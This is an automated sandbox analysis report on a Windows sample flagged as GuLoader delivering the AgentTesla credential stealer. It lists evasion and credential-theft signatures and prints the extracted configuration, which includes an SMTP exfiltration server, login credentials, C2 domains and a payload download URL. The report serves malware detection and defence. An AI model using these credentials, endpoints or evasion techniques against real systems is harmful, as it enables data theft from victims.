Play interactive tour

Edit tour

Analysis Report Dimmock5.exe

Overview

General Information

Sample Name:	Dimmock5.exe
Analysis ID:	381541
MD5:	1f6c8e6472b60d49704703c99b28a4b8
SHA1:	1770766f6cfb51725e035b0f38f560bf03d73fae
SHA256:	e0e93e3b7866085b8384948d12a2eb613fc9eb0bc283fbbe12841a5dca11ba9f
Tags:	GuLoader
Infos:
Most interesting Screenshot:

Detection

AgentTesla GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Potential malicious icon found

Sigma detected: RegAsm connects to smtp port

Yara detected AgentTesla

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Found evasive API chain (trying to detect sleep duration tampering with parallel thread)

Hides threads from debuggers

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses SMTP (mail sending)

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Startup

System is w10x64

Dimmock5.exe (PID: 4708 cmdline: 'C:\Users\user\Desktop\Dimmock5.exe' MD5: 1F6C8E6472B60D49704703C99B28A4B8)

RegAsm.exe (PID: 5596 cmdline: 'C:\Users\user\Desktop\Dimmock5.exe' MD5: 529695608EAFBED00ACA9E61EF333A7C)

conhost.exe (PID: 5856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "kpYtlUSCkDM", "URL: ": "http://JgAptYOPYbQxfk.net", "To: ": "", "ByHost: ": "mail.palacioguevara.com:587", "Password: ": "sUUgblUr6c", "From: ": ""}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000016.00000002.728202576.0000000001351000.00000040.00000001.sdmp	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
00000016.00000002.734840874.000000001E0F1000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000016.00000002.734840874.000000001E0F1000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 5596	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegAsm.exe PID: 5596	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 5596	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Click to see the 1 entries

Sigma Overview

System Summary:

Sigma detected: RegAsm connects to smtp port

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 54.37.255.108, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, Initiated: true, ProcessId: 5596, Protocol: tcp, SourceIp: 192.168.2.3, SourceIsIpv6: false, SourcePort: 49754

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: RegAsm.exe.5596.22.memstr

Malware Configuration Extractor: Agenttesla {"Username: ": "kpYtlUSCkDM", "URL: ": "http://JgAptYOPYbQxfk.net", "To: ": "", "ByHost: ": "mail.palacioguevara.com:587", "Password: ": "sUUgblUr6c", "From: ": ""}

Multi AV Scanner detection for submitted file

Show sources

Source: Dimmock5.exe	Virustotal: Detection: 56%	Perma Link
Source: Dimmock5.exe	Metadefender: Detection: 24%	Perma Link
Source: Dimmock5.exe	ReversingLabs: Detection: 72%

Source: Dimmock5.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 172.217.23.33:443 -> 192.168.2.3:49741 version: TLS 1.2

Source:

Binary string: mscorrc.pdb source: RegAsm.exe, 00000016.00000002.736394339.0000000020E00000.00000002.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: http://JgAptYOPYbQxfk.net

Source: global traffic

TCP traffic: 192.168.2.3:49754 -> 54.37.255.108:587

Source: Joe Sandbox View

ASN Name: OVHFR OVHFR

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic

TCP traffic: 192.168.2.3:49754 -> 54.37.255.108:587

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 22_2_1DECA09A recv,

22_2_1DECA09A

Source: unknown

DNS traffic detected: queries for: doc-14-04-docs.googleusercontent.com

Source: RegAsm.exe, 00000016.00000002.734840874.000000001E0F1000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: RegAsm.exe, 00000016.00000002.734840874.000000001E0F1000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: RegAsm.exe, 00000016.00000002.734840874.000000001E0F1000.00000004.00000001.sdmp	String found in binary or memory: http://ENtKzK.com
Source: RegAsm.exe, 00000016.00000002.734926660.000000001E1A8000.00000004.00000001.sdmp, RegAsm.exe, 00000016.00000002.734840874.000000001E0F1000.00000004.00000001.sdmp	String found in binary or memory: http://JgAptYOPYbQxfk.net
Source: RegAsm.exe, 00000016.00000003.685186556.0000000001681000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: RegAsm.exe, 00000016.00000003.685186556.0000000001681000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: RegAsm.exe, 00000016.00000003.685186556.0000000001681000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: RegAsm.exe, 00000016.00000003.685186556.0000000001681000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: RegAsm.exe, 00000016.00000003.685186556.0000000001681000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: RegAsm.exe, 00000016.00000003.685186556.0000000001681000.00000004.00000001.sdmp	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: RegAsm.exe	String found in binary or memory: https://drive.google.com/uc?export=download&id=1bR5iuFkkMmFeiPqo3eCvIQyKbcDGCnIO
Source: RegAsm.exe, 00000016.00000002.728202576.0000000001351000.00000040.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1bR5iuFkkMmFeiPqo3eCvIQyKbcDGCnIO8
Source: RegAsm.exe, 00000016.00000003.685186556.0000000001681000.00000004.00000001.sdmp	String found in binary or memory: https://pki.goog/repository/0
Source: RegAsm.exe, 00000016.00000002.734840874.000000001E0F1000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443

Source: unknown

HTTPS traffic detected: 172.217.23.33:443 -> 192.168.2.3:49741 version: TLS 1.2

Source: Dimmock5.exe, 00000000.00000002.457921405.000000000060A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

Potential malicious icon found

Show sources

Source: initial sample

Icon embedded in PE file: bad icon match: 20047c7c70f0e004

Source: C:\Users\user\Desktop\Dimmock5.exe

Process Stats: CPU usage > 98%

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 22_2_01353325 NtProtectVirtualMemory,	22_2_01353325
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 22_2_1DECB0BA NtQuerySystemInformation,	22_2_1DECB0BA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 22_2_1DECB089 NtQuerySystemInformation,	22_2_1DECB089

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 22_2_1D2E9938	22_2_1D2E9938
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 22_2_1D2EEE08	22_2_1D2EEE08
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 22_2_1D2E6310	22_2_1D2E6310
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 22_2_1D2E7A10	22_2_1D2E7A10
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 22_2_1D2E0860	22_2_1D2E0860
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 22_2_1D2E4B70	22_2_1D2E4B70
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 22_2_1D2E0CA0	22_2_1D2E0CA0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 22_2_1D2E2290	22_2_1D2E2290
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 22_2_1D2E6B90	22_2_1D2E6B90
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 22_2_1D2E8AE0	22_2_1D2E8AE0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 22_2_2029EAEC	22_2_2029EAEC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 22_2_20298320	22_2_20298320

Source: Dimmock5.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: Dimmock5.exe, 00000000.00000002.457965940.00000000020A0000.00000002.00000001.sdmp

Binary or memory string: OriginalFilenameuser32j% vs Dimmock5.exe

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Section loaded: sfc.dll

Jump to behavior

Source: Dimmock5.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@3/1@2/2

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 22_2_1DECAF3E AdjustTokenPrivileges,		22_2_1DECAF3E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 22_2_1DECAF07 AdjustTokenPrivileges,		22_2_1DECAF07

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5856:120:WilError_01

Source: Dimmock5.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Dimmock5.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Dimmock5.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Dimmock5.exe	Virustotal: Detection: 56%
Source: Dimmock5.exe	Metadefender: Detection: 24%
Source: Dimmock5.exe	ReversingLabs: Detection: 72%

Source: unknown	Process created: C:\Users\user\Desktop\Dimmock5.exe 'C:\Users\user\Desktop\Dimmock5.exe'
Source: C:\Users\user\Desktop\Dimmock5.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\Dimmock5.exe'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source:

Binary string: mscorrc.pdb source: RegAsm.exe, 00000016.00000002.736394339.0000000020E00000.00000002.00000001.sdmp

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: 00000016.00000002.728202576.0000000001351000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5596, type: MEMORY

Source: C:\Users\user\Desktop\Dimmock5.exe	Code function: 0_2_00404CCD push FFFFFF83h; iretd	0_2_00404CD2
Source: C:\Users\user\Desktop\Dimmock5.exe	Code function: 0_2_00404D0C push ss; iretd	0_2_00404D0D
Source: C:\Users\user\Desktop\Dimmock5.exe	Code function: 0_2_00406126 push ss; ret	0_2_00406127
Source: C:\Users\user\Desktop\Dimmock5.exe	Code function: 0_2_00401E1C push esp; retf 0040h	0_2_00401E1D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 22_2_1D2E35F0 push ebp; ret	22_2_1D2E360E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 22_2_2029C6EA push esp; retf	22_2_2029C6F1

Source: C:\Users\user\Desktop\Dimmock5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dimmock5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dimmock5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dimmock5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dimmock5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
